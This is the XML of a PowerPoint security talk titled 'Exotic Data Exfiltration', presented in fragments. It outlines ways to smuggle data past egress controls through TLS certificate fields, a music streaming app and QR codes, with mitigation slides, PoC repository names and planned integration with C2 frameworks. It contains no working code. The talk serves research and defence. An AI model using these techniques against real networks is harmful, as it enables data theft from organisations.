                  <a:srgbClr val="9FC5E8"/>
                </a:solidFill>
                <a:latin typeface="Fira Sans"/>
                <a:ea typeface="Fira Sans"/>
                <a:cs typeface="Fira Sans"/>
                <a:sym typeface="Fira Sans"/>
              </a:rPr>
              <a:t>userField</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="9FC5E8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600">
              <a:solidFill>
                <a:srgbClr val="9FC5E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endParaRPr sz="15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311700" y="2326475"/>
            <a:ext cx="57975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8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Future work?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1658" b="1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658" b="1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22489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79"/>
              <a:buFont typeface="Arvo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1478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Tuning/refactoring</a:t>
            </a:r>
            <a:endParaRPr sz="1478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224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79"/>
              <a:buFont typeface="Arvo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1478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C2 modules integration (e.g., Brute Ratel, Sliver, Merlin)</a:t>
            </a:r>
            <a:endParaRPr sz="1478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224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79"/>
              <a:buFont typeface="Arvo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1478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More ideas with PoC code to be released soon</a:t>
            </a:r>
            <a:endParaRPr sz="1478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78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78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305" name="Google Shape;305;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5031600" y="3795150"/>
            <a:ext cx="38256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8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PoC Code</a:t>
            </a:r>
            <a:endParaRPr sz="1558">
              <a:solidFill>
                <a:srgbClr val="9FC5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78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https://github.com/sourcefrenchy/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1378" b="1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certexfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1378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78">
              <a:solidFill>
                <a:srgbClr val="9FC5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78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https://github.com/sourcefrenchy/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1378" b="1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spotexfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1378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78">
              <a:solidFill>
                <a:srgbClr val="9FC5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78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https://github.com/sourcefrenchy/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1378" b="1" u="sng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goqrexfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1478">
                <a:solidFill>
                  <a:srgbClr val="9FC5E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="1378">
              <a:solidFill>
                <a:srgbClr val="9FC5E8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9FC5E8"/>
              </a:solidFill>
            </a:endParaRPr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6">
            <a:alphaModFix amt="79000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5942349" y="386275"/>
            <a:ext cx="2661199" cy="2669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6000000" algn="bl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="Google Shape;307;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3795150"/>
            <a:ext cx="4719900" cy="22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8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Updates/Stay in touch</a:t>
            </a:r>
            <a:endParaRPr sz="1658" b="1">
              <a:solidFill>
                <a:schemeClr val="accent4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         @SourceFrenchy</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="9FC5E8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          https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1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threema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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.id/6B4FR572</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="9FC5E8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78" b="1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8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658" b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552" y="4288750"/>
            <a:ext cx="236351" cy="2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6"/>
          <p:cNvPicPr preferRelativeResize="0"/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8303350" y="3376225"/>
            <a:ext cx="467900" cy="4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4591775"/>
            <a:ext cx="304051" cy="30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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242150" y="1575863"/>
            <a:ext cx="5459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Exfil is really hard to prevent</a:t>
            </a:r>
            <a:endParaRPr sz="160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242150" y="1305200"/>
            <a:ext cx="5607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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="16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Whitelisted SaaS apps are you friend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>
              <a:solidFill>
                <a:srgbClr val="FF99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Appendix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Better catch threat actor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2820" b="1" u="sng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before</a:t>
            </a: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 Exfil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42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(APT28 example)</a:t>
            </a:r>
            <a:endParaRPr sz="2022"/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7418"/>
            <a:ext cx="9144003" cy="4822033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:reflection stA="86000" endPos="74000" dist="209550" dir="5400000" fadeDir="5400012" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Google Shape;328;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71900" y="4696975"/>
            <a:ext cx="68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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Google Shape;329;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8567050" y="1084775"/>
            <a:ext cx="475200" cy="341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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179250" y="1064175"/>
            <a:ext cx="69636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“[...] used TCP SYN packets to set up a covert communication channel. [...] Team Pangu called it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1" i="1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Bvp47</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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“</a:t>
            </a:r>
            <a:endParaRPr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5" name="Google Shape;33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Be even more creative …</a:t>
            </a:r>
            <a:endParaRPr sz="2022"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="336" name="Google Shape;336;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255575" y="3337150"/>
            <a:ext cx="60387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“Our results show that using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" i="1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AiR-ViBeR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="18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, data can be exfiltrated from air-gapped computer to a nearby smartphone on the same table, or even an adjacent table, via vibrations,”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="337" name="Google Shape;337;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653875" y="2005638"/>
            <a:ext cx="83997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"we show that attackers can use the SATA cable as a wireless antenna to transfer radio signals at the 6GHz frequency band,"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="9FC5E8"/>
                </a:solidFill>
                <a:latin typeface="Arvo"/>
                <a:ea typeface="Arvo"/>
                <a:cs typeface="Arvo"/>
                <a:sym typeface="Arvo"/>
              </a:rPr>
              <a:t> SATAn: Air-Gap Exfiltration Attack via Radio Signals From SATA Cables</a:t>
            </a:r>
            <a:endParaRPr sz="1900" b="1" i="1">
              <a:solidFill>
                <a:srgbClr val="9FC5E8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Current</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="FF99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landscape</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="FF99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" y="1476901"/>
            <a:ext cx="9585925" cy="5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0651" y="-437963"/>
            <a:ext cx="9898248" cy="77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4956800" y="336638"/>
            <a:ext cx="4074000" cy="20154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typical, above average capabilities</a:t>
            </a:r>
            <a:endParaRPr sz="15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vo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Media policy (USB..)</a:t>
            </a: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vo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Strict Firewall rules (no SMB out, etc.)</a:t>
            </a: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Web proxy in place to tunnel all egress traffic</a:t>
            </a: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TLS interception to see things in clear</a:t>
            </a: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vo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Endpoint Detection &amp; Response</a:t>
            </a:r>
            <a:endParaRPr sz="13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vo"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="13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Network forensics</a:t>
            </a:r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275" y="2308781"/>
            <a:ext cx="2217050" cy="220788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219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Idea </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="24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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2820">
                <a:solidFill>
                  <a:srgbClr val="FF99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1</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="FF99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TLS fun with certificates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800" y="-85664"/>
            <a:ext cx="4920601" cy="571843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FEFEF">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic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#1 - TLS fun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87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82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rPr>
              <a:t>Abusing X509 Subject Alternative Name </a:t>
            </a:r>
            <a:endParaRPr sz="1682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1062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907" i="1">
              <a:solidFill>
                <a:srgbClr val="FCE5CD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184050" y="4208750"/>
            <a:ext cx="4920600" cy="1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(src/crypto/tls/common.go</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="15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 b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maxHandshake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65536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 maximum handshake we support (protocol max is 16 MB)</a:t>
            </a:r>
            <a:endParaRPr sz="11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i="1">
              <a:solidFill>
                <a:srgbClr val="FCE5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6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="2162" b="2162"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1788413" y="2969362"/>
            <a:ext cx="1533678" cy="1130638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" name="Google Shape;100;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="184050" y="1626538"/>
            <a:ext cx="474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SRVName ::= IA5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="15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5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(SIZE (1..MAX))</a:t>
            </a:r>
            <a:endParaRPr sz="15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20500" y="2149738"/>
            <a:ext cx="4247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“MAX indicates the upper bound [...] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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Implementations are free to choose an upper bound</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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that suits their environment.”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5855525" y="3616375"/>
            <a:ext cx="1948725" cy="608975"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartProcess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0055"/>
            <a:ext cx="9144003" cy="317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2849450" y="1360025"/>
            <a:ext cx="3315300" cy="3170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6164750" y="1359900"/>
            <a:ext cx="3351600" cy="3170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6164750" y="3525000"/>
            <a:ext cx="3875100" cy="1005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0055"/>
            <a:ext cx="9144003" cy="317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F99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Idea</a:t>
            </a:r>
            <a:endParaRPr sz="2820">
              <a:solidFill>
                <a:srgbClr val="FF99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>
              <a:solidFill>
                <a:srgbClr val="FF99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6164750" y="3525000"/>
            <a:ext cx="3875100" cy="1005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2908675" y="1705100"/>
            <a:ext cx="3167700" cy="2699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0055"/>
            <a:ext cx="9144003" cy="317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Idea</a:t>
            </a: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b="1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2012</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>335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Comfortaa SemiBold</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Varela Round</vt:lpstr>
      <vt:lpstr>Arvo</vt:lpstr>
      <vt:lpstr>Fira Sans</vt:lpstr>
      <vt:lpstr>Comfortaa</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Comfortaa Light</vt:lpstr>
      <vt:lpstr>Simple Dark</vt:lpstr>
      <vt:lpstr>Exotic Data Exfiltration</vt:lpstr>
      <vt:lpstr>❯ whoami</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Current landscape</vt:lpstr>
      <vt:lpstr>Idea #1 TLS fun with certificates </vt:lpstr>
      <vt:lpstr>#1 - TLS fun</vt:lpstr>
      <vt:lpstr>Idea </vt:lpstr>
      <vt:lpstr>Idea </vt:lpstr>
      <vt:lpstr>Idea </vt:lpstr>
      <vt:lpstr>Client                              Server  </vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Idea #2 Fun with a Music streaming app</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Idea</vt:lpstr>
      <vt:lpstr>Idea</vt:lpstr>
      <vt:lpstr>Client    Server</vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Idea #3 Quick Response code</vt:lpstr>
      <vt:lpstr>#3: Side-channel fun for insiders</vt:lpstr>
      <vt:lpstr>Idea</vt:lpstr>
      <vt:lpstr>Idea</vt:lpstr>
      <vt:lpstr>Idea</vt:lpstr>
      <vt:lpstr>Client</vt:lpstr>
      <vt:lpstr>Client</vt:lpstr>
      <vt:lpstr>Server</vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Possible mitigations</vt:lpstr>
      <vt:lpstr>Relax now … we’re done!</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> Appendix</vt:lpstr>
      <vt:lpstr>Better catch threat actor before Exfil (APT28 example)</vt:lpstr>
      <vt:lpstr>Be even more creative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Exotic Data Exfiltration</dc:title>
  <cp:lastModifiedBy>JM AMB</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-13T17:43:32Z</dcterms:modified>
</cp:coreProperties>
</file>